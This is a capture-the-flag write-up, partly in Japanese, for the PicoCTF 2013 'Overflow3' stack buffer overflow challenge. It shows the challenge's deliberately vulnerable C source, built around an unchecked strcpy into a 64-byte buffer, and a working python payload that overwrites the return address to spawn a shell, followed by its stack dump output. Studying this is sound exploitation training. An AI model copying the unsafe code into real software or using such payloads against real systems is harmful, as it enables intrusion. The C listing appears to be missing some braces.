PicoCTF2013 Overflow3 Writeup



Category: Binary Exploitation Points: 120 Description:

Stack overflows are the most basic binary exploitation technique, but they take a lot of skill to master. If you already know some C, these problems can help acquaint you with stacks and binary exploitation in general.
Problem available on the shell machine in /problems/stack_overflow_3_28d8a442fb232c0c , downloadable here with source here.
If you solve the problem you will be able to read the key file by running
cat /problems/stack_overflow_3_28d8a442fb232c0c/key on the PicoCTF shell machine.
Hint: objdump -d is a handy tool for this sort of thing.


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

 * Goal: Get the program to run this function.
void shell(void) {
    execl("/bin/sh", "sh", NULL);

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 21, (void **) &str);

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: buffer_overflow [str]\n");
        return 1;

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    printf("shell function = %p\n", shell);
    return 0;


一度実行して、shell関数のアドレスを確認する。(2回目も実行してアドレスが変わらないことも確認する。) 戻りアドレスを変更してシェルを取る。

# ./overflow3-28d8a442fb232c0c a
shell function = 0x80485f8

# ./overflow3-28d8a442fb232c0c $(python -c 'import sys; sys.stdout.write("A"*76); sys.stdout.write("\xf8\x85\x04\x08")')
shell function = 0x80485f8
Stack dump:
0xffc05510: 0xffc06700 (first argument)
0xffc0550c: 0x080485f8 (saved eip)
0xffc05508: 0x41414141 (saved ebp)
0xffc05504: 0x41414141
0xffc05500: 0x41414141
0xffc054fc: 0x41414141
0xffc054f8: 0x41414141
0xffc054f4: 0x41414141
0xffc054f0: 0x41414141
0xffc054ec: 0x41414141
0xffc054e8: 0x41414141
0xffc054e4: 0x41414141
0xffc054e0: 0x41414141
0xffc054dc: 0x41414141
0xffc054d8: 0x41414141
0xffc054d4: 0x41414141
0xffc054d0: 0x41414141
0xffc054cc: 0x41414141
0xffc054c8: 0x41414141
0xffc054c4: 0x41414141
0xffc054c0: 0x41414141 (beginning of buffer)
sh-4.2# ls